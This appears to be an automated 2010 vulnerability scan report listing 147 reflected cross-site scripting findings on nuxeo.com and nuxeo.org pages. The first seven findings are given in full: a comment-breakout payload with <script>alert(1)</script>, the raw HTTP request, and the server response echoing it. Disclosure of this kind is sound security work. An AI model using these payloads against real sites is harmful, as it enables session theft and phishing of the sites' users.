Report generated by XSS.CX at Mon Nov 15 09:29:35 CST 2010.


Cross Site Scripting Reports | Hoyt LLC Research

Loading

1. Cross-site scripting (reflected)

1.1. http://www.nuxeo.com/embedded/yellow-ribbon-en [REST URL parameter 1]

1.2. http://www.nuxeo.com/embedded/yellow-ribbon-en [REST URL parameter 2]

1.3. http://www.nuxeo.com/en/about/events/nuxeoworld2010 [REST URL parameter 1]

1.4. http://www.nuxeo.com/en/about/events/nuxeoworld2010 [REST URL parameter 2]

1.5. http://www.nuxeo.com/en/about/events/nuxeoworld2010 [REST URL parameter 3]

1.6. http://www.nuxeo.com/en/about/events/nuxeoworld2010 [REST URL parameter 4]

1.7. http://www.nuxeo.com/en/downloads/download-dm-form [REST URL parameter 1]

1.8. http://www.nuxeo.com/en/downloads/download-dm-form [REST URL parameter 2]

1.9. http://www.nuxeo.com/en/downloads/download-dm-form [REST URL parameter 3]

1.10. http://www.nuxeo.com/en/products/document-management/getting-started [REST URL parameter 1]

1.11. http://www.nuxeo.com/en/products/document-management/getting-started [REST URL parameter 2]

1.12. http://www.nuxeo.com/en/products/document-management/getting-started [REST URL parameter 3]

1.13. http://www.nuxeo.com/en/products/document-management/getting-started [REST URL parameter 4]

1.14. http://www.nuxeo.com/en/services/training [REST URL parameter 1]

1.15. http://www.nuxeo.com/en/services/training [REST URL parameter 2]

1.16. http://www.nuxeo.com/en/services/training [REST URL parameter 3]

1.17. http://www.nuxeo.com/extension/nuxeo_design/design/nuxeo/javascript/mtcJSAPI.js [REST URL parameter 1]

1.18. http://www.nuxeo.com/extension/nuxeo_design/design/nuxeo/javascript/mtcJSAPI.js [REST URL parameter 3]

1.19. http://www.nuxeo.com/extension/nuxeo_design/design/nuxeo/javascript/mtcJSAPI.js [REST URL parameter 5]

1.20. http://www.nuxeo.org/discussions/index.jspa [name of an arbitrarily supplied request parameter]

1.21. http://www.nuxeo.org/xwiki/bin/export/Main/WebHome [REST URL parameter 4]

1.22. http://www.nuxeo.org/xwiki/bin/export/Main/WebHome [REST URL parameter 4]

1.23. http://www.nuxeo.org/xwiki/bin/export/Main/WebHome [REST URL parameter 5]

1.24. http://www.nuxeo.org/xwiki/bin/export/Main/WebHome [REST URL parameter 5]

1.25. http://www.nuxeo.org/xwiki/bin/export/skins/toucan [REST URL parameter 4]

1.26. http://www.nuxeo.org/xwiki/bin/export/skins/toucan [REST URL parameter 4]

1.27. http://www.nuxeo.org/xwiki/bin/export/skins/toucan [REST URL parameter 5]

1.28. http://www.nuxeo.org/xwiki/bin/export/skins/toucan [REST URL parameter 5]

1.29. http://www.nuxeo.org/xwiki/bin/login/XWiki/XWikiLogin [xredirect parameter]

1.30. http://www.nuxeo.org/xwiki/bin/register/XWiki/Register [REST URL parameter 4]

1.31. http://www.nuxeo.org/xwiki/bin/register/XWiki/Register [REST URL parameter 4]

1.32. http://www.nuxeo.org/xwiki/bin/register/XWiki/Register [REST URL parameter 5]

1.33. http://www.nuxeo.org/xwiki/bin/register/XWiki/Register [REST URL parameter 5]

1.34. http://www.nuxeo.org/xwiki/bin/view/FAQ/DownloadingNuxeoSources [REST URL parameter 4]

1.35. http://www.nuxeo.org/xwiki/bin/view/FAQ/DownloadingNuxeoSources [REST URL parameter 4]

1.36. http://www.nuxeo.org/xwiki/bin/view/FAQ/DownloadingNuxeoSources [REST URL parameter 5]

1.37. http://www.nuxeo.org/xwiki/bin/view/FAQ/DownloadingNuxeoSources [REST URL parameter 5]

1.38. http://www.nuxeo.org/xwiki/bin/view/FAQ/LDAPSetup [REST URL parameter 4]

1.39. http://www.nuxeo.org/xwiki/bin/view/FAQ/LDAPSetup [REST URL parameter 4]

1.40. http://www.nuxeo.org/xwiki/bin/view/FAQ/LDAPSetup [REST URL parameter 5]

1.41. http://www.nuxeo.org/xwiki/bin/view/FAQ/LDAPSetup [REST URL parameter 5]

1.42. http://www.nuxeo.org/xwiki/bin/view/Main/ [REST URL parameter 4]

1.43. http://www.nuxeo.org/xwiki/bin/view/Main/ [REST URL parameter 4]

1.44. http://www.nuxeo.org/xwiki/bin/view/Main/Ajax4JSF+Good+practices [REST URL parameter 4]

1.45. http://www.nuxeo.org/xwiki/bin/view/Main/Ajax4JSF+Good+practices [REST URL parameter 4]

1.46. http://www.nuxeo.org/xwiki/bin/view/Main/Ajax4JSF+Good+practices [REST URL parameter 5]

1.47. http://www.nuxeo.org/xwiki/bin/view/Main/Ajax4JSF+Good+practices [REST URL parameter 5]

1.48. http://www.nuxeo.org/xwiki/bin/view/Main/AllDocs [REST URL parameter 4]

1.49. http://www.nuxeo.org/xwiki/bin/view/Main/AllDocs [REST URL parameter 4]

1.50. http://www.nuxeo.org/xwiki/bin/view/Main/AllDocs [REST URL parameter 5]

1.51. http://www.nuxeo.org/xwiki/bin/view/Main/AllDocs [REST URL parameter 5]

1.52. http://www.nuxeo.org/xwiki/bin/view/Main/BlogRss [REST URL parameter 4]

1.53. http://www.nuxeo.org/xwiki/bin/view/Main/BlogRss [REST URL parameter 4]

1.54. http://www.nuxeo.org/xwiki/bin/view/Main/BlogRss [REST URL parameter 5]

1.55. http://www.nuxeo.org/xwiki/bin/view/Main/BlogRss [REST URL parameter 5]

1.56. http://www.nuxeo.org/xwiki/bin/view/Main/BookAdminMoved [REST URL parameter 4]

1.57. http://www.nuxeo.org/xwiki/bin/view/Main/BookAdminMoved [REST URL parameter 4]

1.58. http://www.nuxeo.org/xwiki/bin/view/Main/BookAdminMoved [REST URL parameter 5]

1.59. http://www.nuxeo.org/xwiki/bin/view/Main/BookAdminMoved [REST URL parameter 5]

1.60. http://www.nuxeo.org/xwiki/bin/view/Main/BookEPMoved [REST URL parameter 4]

1.61. http://www.nuxeo.org/xwiki/bin/view/Main/BookEPMoved [REST URL parameter 4]

1.62. http://www.nuxeo.org/xwiki/bin/view/Main/BookEPMoved [REST URL parameter 5]

1.63. http://www.nuxeo.org/xwiki/bin/view/Main/BookEPMoved [REST URL parameter 5]

1.64. http://www.nuxeo.org/xwiki/bin/view/Main/CMIS [REST URL parameter 4]

1.65. http://www.nuxeo.org/xwiki/bin/view/Main/CMIS [REST URL parameter 4]

1.66. http://www.nuxeo.org/xwiki/bin/view/Main/CMIS [REST URL parameter 5]

1.67. http://www.nuxeo.org/xwiki/bin/view/Main/CMIS [REST URL parameter 5]

1.68. http://www.nuxeo.org/xwiki/bin/view/Main/ContributionSpace [REST URL parameter 4]

1.69. http://www.nuxeo.org/xwiki/bin/view/Main/ContributionSpace [REST URL parameter 4]

1.70. http://www.nuxeo.org/xwiki/bin/view/Main/ContributionSpace [REST URL parameter 5]

1.71. http://www.nuxeo.org/xwiki/bin/view/Main/ContributionSpace [REST URL parameter 5]

1.72. http://www.nuxeo.org/xwiki/bin/view/Main/Dashboard [REST URL parameter 4]

1.73. http://www.nuxeo.org/xwiki/bin/view/Main/Dashboard [REST URL parameter 4]

1.74. http://www.nuxeo.org/xwiki/bin/view/Main/Dashboard [REST URL parameter 5]

1.75. http://www.nuxeo.org/xwiki/bin/view/Main/Dashboard [REST URL parameter 5]

1.76. http://www.nuxeo.org/xwiki/bin/view/Main/Downloads [REST URL parameter 4]

1.77. http://www.nuxeo.org/xwiki/bin/view/Main/Downloads [REST URL parameter 4]

1.78. http://www.nuxeo.org/xwiki/bin/view/Main/Downloads [REST URL parameter 5]

1.79. http://www.nuxeo.org/xwiki/bin/view/Main/Downloads [REST URL parameter 5]

1.80. http://www.nuxeo.org/xwiki/bin/view/Main/Howto+launch+the+selenium+test+suite [REST URL parameter 4]

1.81. http://www.nuxeo.org/xwiki/bin/view/Main/Howto+launch+the+selenium+test+suite [REST URL parameter 4]

1.82. http://www.nuxeo.org/xwiki/bin/view/Main/Howto+launch+the+selenium+test+suite [REST URL parameter 5]

1.83. http://www.nuxeo.org/xwiki/bin/view/Main/Howto+launch+the+selenium+test+suite [REST URL parameter 5]

1.84. http://www.nuxeo.org/xwiki/bin/view/Main/JCRMigration [REST URL parameter 4]

1.85. http://www.nuxeo.org/xwiki/bin/view/Main/JCRMigration [REST URL parameter 4]

1.86. http://www.nuxeo.org/xwiki/bin/view/Main/JCRMigration [REST URL parameter 5]

1.87. http://www.nuxeo.org/xwiki/bin/view/Main/JCRMigration [REST URL parameter 5]

1.88. http://www.nuxeo.org/xwiki/bin/view/Main/Nuxeo+Testing+Framework [REST URL parameter 4]

1.89. http://www.nuxeo.org/xwiki/bin/view/Main/Nuxeo+Testing+Framework [REST URL parameter 4]

1.90. http://www.nuxeo.org/xwiki/bin/view/Main/Nuxeo+Testing+Framework [REST URL parameter 5]

1.91. http://www.nuxeo.org/xwiki/bin/view/Main/Nuxeo+Testing+Framework [REST URL parameter 5]

1.92. http://www.nuxeo.org/xwiki/bin/view/Main/NuxeoDevGettingStarted [REST URL parameter 4]

1.93. http://www.nuxeo.org/xwiki/bin/view/Main/NuxeoDevGettingStarted [REST URL parameter 4]

1.94. http://www.nuxeo.org/xwiki/bin/view/Main/NuxeoDevGettingStarted [REST URL parameter 5]

1.95. http://www.nuxeo.org/xwiki/bin/view/Main/NuxeoDevGettingStarted [REST URL parameter 5]

1.96. http://www.nuxeo.org/xwiki/bin/view/Main/NuxeoProdSetup [REST URL parameter 4]

1.97. http://www.nuxeo.org/xwiki/bin/view/Main/NuxeoProdSetup [REST URL parameter 4]

1.98. http://www.nuxeo.org/xwiki/bin/view/Main/NuxeoProdSetup [REST URL parameter 5]

1.99. http://www.nuxeo.org/xwiki/bin/view/Main/NuxeoProdSetup [REST URL parameter 5]

1.100. http://www.nuxeo.org/xwiki/bin/view/Main/QuickStart53 [REST URL parameter 4]

1.101. http://www.nuxeo.org/xwiki/bin/view/Main/QuickStart53 [REST URL parameter 4]

1.102. http://www.nuxeo.org/xwiki/bin/view/Main/QuickStart53 [REST URL parameter 5]

1.103. http://www.nuxeo.org/xwiki/bin/view/Main/QuickStart53 [REST URL parameter 5]

1.104. http://www.nuxeo.org/xwiki/bin/view/Main/RssFeeds [REST URL parameter 4]

1.105. http://www.nuxeo.org/xwiki/bin/view/Main/RssFeeds [REST URL parameter 4]

1.106. http://www.nuxeo.org/xwiki/bin/view/Main/RssFeeds [REST URL parameter 5]

1.107. http://www.nuxeo.org/xwiki/bin/view/Main/RssFeeds [REST URL parameter 5]

1.108. http://www.nuxeo.org/xwiki/bin/view/Main/Tags [REST URL parameter 4]

1.109. http://www.nuxeo.org/xwiki/bin/view/Main/Tags [REST URL parameter 4]

1.110. http://www.nuxeo.org/xwiki/bin/view/Main/Tags [REST URL parameter 5]

1.111. http://www.nuxeo.org/xwiki/bin/view/Main/Tags [REST URL parameter 5]

1.112. http://www.nuxeo.org/xwiki/bin/view/Main/Understanding+JBoss+Directories [REST URL parameter 4]

1.113. http://www.nuxeo.org/xwiki/bin/view/Main/Understanding+JBoss+Directories [REST URL parameter 4]

1.114. http://www.nuxeo.org/xwiki/bin/view/Main/Understanding+JBoss+Directories [REST URL parameter 5]

1.115. http://www.nuxeo.org/xwiki/bin/view/Main/Understanding+JBoss+Directories [REST URL parameter 5]

1.116. http://www.nuxeo.org/xwiki/bin/view/Main/Using+Nuxeo+API [REST URL parameter 4]

1.117. http://www.nuxeo.org/xwiki/bin/view/Main/Using+Nuxeo+API [REST URL parameter 4]

1.118. http://www.nuxeo.org/xwiki/bin/view/Main/Using+Nuxeo+API [REST URL parameter 5]

1.119. http://www.nuxeo.org/xwiki/bin/view/Main/Using+Nuxeo+API [REST URL parameter 5]

1.120. http://www.nuxeo.org/xwiki/bin/view/Main/WebRss [REST URL parameter 4]

1.121. http://www.nuxeo.org/xwiki/bin/view/Main/WebRss [REST URL parameter 4]

1.122. http://www.nuxeo.org/xwiki/bin/view/Main/WebRss [REST URL parameter 5]

1.123. http://www.nuxeo.org/xwiki/bin/view/Main/WebRss [REST URL parameter 5]

1.124. http://www.nuxeo.org/xwiki/bin/view/Main/WebSearch [REST URL parameter 4]

1.125. http://www.nuxeo.org/xwiki/bin/view/Main/WebSearch [REST URL parameter 4]

1.126. http://www.nuxeo.org/xwiki/bin/view/Main/WebSearch [REST URL parameter 5]

1.127. http://www.nuxeo.org/xwiki/bin/view/Main/WebSearch [REST URL parameter 5]

1.128. http://www.nuxeo.org/xwiki/bin/view/Main/WindowsService [REST URL parameter 4]

1.129. http://www.nuxeo.org/xwiki/bin/view/Main/WindowsService [REST URL parameter 4]

1.130. http://www.nuxeo.org/xwiki/bin/view/Main/WindowsService [REST URL parameter 5]

1.131. http://www.nuxeo.org/xwiki/bin/view/Main/WindowsService [REST URL parameter 5]

1.132. http://www.nuxeo.org/xwiki/bin/view/XWiki/Admin [REST URL parameter 4]

1.133. http://www.nuxeo.org/xwiki/bin/view/XWiki/Admin [REST URL parameter 4]

1.134. http://www.nuxeo.org/xwiki/bin/view/XWiki/Admin [REST URL parameter 5]

1.135. http://www.nuxeo.org/xwiki/bin/view/XWiki/Admin [REST URL parameter 5]

1.136. http://www.nuxeo.org/xwiki/bin/view/XWiki/JaneZupan [REST URL parameter 4]

1.137. http://www.nuxeo.org/xwiki/bin/view/XWiki/JaneZupan [REST URL parameter 4]

1.138. http://www.nuxeo.org/xwiki/bin/view/XWiki/JaneZupan [REST URL parameter 5]

1.139. http://www.nuxeo.org/xwiki/bin/view/XWiki/JaneZupan [REST URL parameter 5]

1.140. http://www.nuxeo.org/xwiki/bin/view/XWiki/LiseKemen [REST URL parameter 4]

1.141. http://www.nuxeo.org/xwiki/bin/view/XWiki/LiseKemen [REST URL parameter 4]

1.142. http://www.nuxeo.org/xwiki/bin/view/XWiki/LiseKemen [REST URL parameter 5]

1.143. http://www.nuxeo.org/xwiki/bin/view/XWiki/LiseKemen [REST URL parameter 5]

1.144. http://www.nuxeo.org/xwiki/bin/view/skins/toucan [REST URL parameter 4]

1.145. http://www.nuxeo.org/xwiki/bin/view/skins/toucan [REST URL parameter 4]

1.146. http://www.nuxeo.org/xwiki/bin/view/skins/toucan [REST URL parameter 5]

1.147. http://www.nuxeo.org/xwiki/bin/view/skins/toucan [REST URL parameter 5]



1. Cross-site scripting (reflected)
There are 147 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.nuxeo.com/embedded/yellow-ribbon-en [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.com
Path:   /embedded/yellow-ribbon-en

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload f0bfc--><script>alert(1)</script>c7ef7c6008c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /embeddedf0bfc--><script>alert(1)</script>c7ef7c6008c/yellow-ribbon-en HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.nuxeo.org/xwiki/bin/view/Main/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.nuxeo.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:08:47 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: eZ Publish
Set-Cookie: eZSESSID=b8b8b46a7bc7fb2aa263ffef59cc9a84; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 14:08:48 GMT
Served-by: www.nuxeo.com
Content-language: en-US
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 33709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<hea
...[SNIP]...
<!--/embeddedf0bfc--><script>alert(1)</script>c7ef7c6008c/yellow-ribbon-en/-->
...[SNIP]...

1.2. http://www.nuxeo.com/embedded/yellow-ribbon-en [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.com
Path:   /embedded/yellow-ribbon-en

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 49edf--><script>alert(1)</script>68af400bc97 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /embedded/yellow-ribbon-en49edf--><script>alert(1)</script>68af400bc97 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.nuxeo.org/xwiki/bin/view/Main/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.nuxeo.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:09:10 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: eZ Publish
Set-Cookie: eZSESSID=8ce74b880425f816357426d1731ae108; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 14:09:10 GMT
Served-by: www.nuxeo.com
Content-language: en-US
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 33672

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<hea
...[SNIP]...
<!--/embedded/yellow-ribbon-en49edf--><script>alert(1)</script>68af400bc97/-->
...[SNIP]...

1.3. http://www.nuxeo.com/en/about/events/nuxeoworld2010 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.com
Path:   /en/about/events/nuxeoworld2010

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 2d2b4--><script>alert(1)</script>159f19a261e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en2d2b4--><script>alert(1)</script>159f19a261e/about/events/nuxeoworld2010 HTTP/1.1
Host: www.nuxeo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: eZSESSID=6b9813c12cd856e64db65c55d01947a8;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:18:24 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: eZ Publish
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 14:18:24 GMT
Served-by: www.nuxeo.com
Content-language: en-US
Status: 404 Not Found
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<hea
...[SNIP]...
<!--/en2d2b4--><script>alert(1)</script>159f19a261e/about/events/nuxeoworld2010/-->
...[SNIP]...

1.4. http://www.nuxeo.com/en/about/events/nuxeoworld2010 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.com
Path:   /en/about/events/nuxeoworld2010

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload a5297--><script>alert(1)</script>3cc6fdb1f92 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/abouta5297--><script>alert(1)</script>3cc6fdb1f92/events/nuxeoworld2010 HTTP/1.1
Host: www.nuxeo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: eZSESSID=6b9813c12cd856e64db65c55d01947a8;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:19:06 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: eZ Publish
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 14:19:06 GMT
Served-by: www.nuxeo.com
Content-language: en-US
Status: 404 Not Found
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<hea
...[SNIP]...
<!--/en/abouta5297--><script>alert(1)</script>3cc6fdb1f92/events/nuxeoworld2010/-->
...[SNIP]...

1.5. http://www.nuxeo.com/en/about/events/nuxeoworld2010 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.com
Path:   /en/about/events/nuxeoworld2010

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload f5c36--><script>alert(1)</script>d4ffa27e9fd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/about/eventsf5c36--><script>alert(1)</script>d4ffa27e9fd/nuxeoworld2010 HTTP/1.1
Host: www.nuxeo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: eZSESSID=6b9813c12cd856e64db65c55d01947a8;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:19:47 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: eZ Publish
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 14:19:47 GMT
Served-by: www.nuxeo.com
Content-language: en-US
Status: 404 Not Found
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33676

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<hea
...[SNIP]...
<!--/en/about/eventsf5c36--><script>alert(1)</script>d4ffa27e9fd/nuxeoworld2010/-->
...[SNIP]...

1.6. http://www.nuxeo.com/en/about/events/nuxeoworld2010 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.com
Path:   /en/about/events/nuxeoworld2010

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload 76a8c--><script>alert(1)</script>892930f1e68 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/about/events/nuxeoworld201076a8c--><script>alert(1)</script>892930f1e68 HTTP/1.1
Host: www.nuxeo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: eZSESSID=6b9813c12cd856e64db65c55d01947a8;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:20:25 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: eZ Publish
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 14:20:25 GMT
Served-by: www.nuxeo.com
Content-language: en-US
Status: 404 Not Found
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33676

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<hea
...[SNIP]...
<!--/en/about/events/nuxeoworld201076a8c--><script>alert(1)</script>892930f1e68/-->
...[SNIP]...

1.7. http://www.nuxeo.com/en/downloads/download-dm-form [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.com
Path:   /en/downloads/download-dm-form

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 47d33--><script>alert(1)</script>1c4a2e654c5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en47d33--><script>alert(1)</script>1c4a2e654c5/downloads/download-dm-form HTTP/1.1
Host: www.nuxeo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: eZSESSID=6b9813c12cd856e64db65c55d01947a8;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:17:56 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: eZ Publish
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 14:17:56 GMT
Served-by: www.nuxeo.com
Content-language: en-US
Status: 404 Not Found
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33711

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<hea
...[SNIP]...
<!--/en47d33--><script>alert(1)</script>1c4a2e654c5/downloads/download-dm-form/-->
...[SNIP]...

